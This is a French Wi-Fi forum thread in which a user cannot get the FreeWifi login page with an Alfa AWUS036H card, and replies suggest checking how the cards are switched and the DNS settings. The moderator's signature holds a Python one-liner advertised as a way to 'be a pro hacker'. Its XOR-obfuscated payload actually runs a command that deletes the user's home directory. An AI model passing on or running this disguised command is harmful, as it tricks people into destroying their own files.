Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-05-2012 11:49:37

goldy
N00b

Connexion a Freewifi impossible avec AWUS036H

Bonjour
j ai une alfa AWUS036H que j'utilise avec un eeepc Win7 Starter, et je m'arrache les cheveux avec.

le 1er coup, ce week end, j 'ai pu 1 seule fois me connecter a un signal FreeWifi que je recevais a 60%.
j ai eu la page d'identification de FreeWifi et l'identification a ete reussie.
ensuite, plus aucune page, rien, le neant.

j ai coupé le pc et quelques dizaines de km plus loin, je recevais un autre signal freewifi tres correct. mais je ne recevais jamais la page d'identification.
J ai passé des heures la dessus. puis j ai tout arreté.

une fois rentré a la maison, meme probleme. Je recois parfaitement 3 signaux freewifi, dont le mien et celui de voisins.
je me connecte dessus, mais toujours pas de page d'identification.

Je fais l'essai SANS l'antenne Alfa et en rallumant mon wifi du pc, et la je me connecte immediatement et sans probleme. Mais avec Alfa je n'ai jamais la page d'identification.

Que dois je faire ?

Merci pour vos conseils

;-)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 13-05-2012 14:12:05

spawn
Modérateur

Re : Connexion a Freewifi impossible avec AWUS036H

C'est suspect.
La carte ne prend en charge que la connexion au réseau, pas ce que tu y fais transiter.
Donc instinctivement, je vais te dire que ça ne vient pas de la carte, mais plutôt de la manière que tu as de t'en servir avec ton PC.
Je ne sais pas vraiment quoi te dire d'autre.
Comment tu switche entre tes deux cartes ?

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 14-05-2012 00:44:26

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : Connexion a Freewifi impossible avec AWUS036H

Vérifies dans : Voir statut > Propriétés > Protocol internet version 4 > Propriétés. si la case ("Obtenir les adresses des serveurs DNS automatiquement") est bien cochée. Tu fais ça avec ta carte Alfa branchée en ayant désactiver ton interface (carte interne) avec qui tu te connectes normalement.

Annonce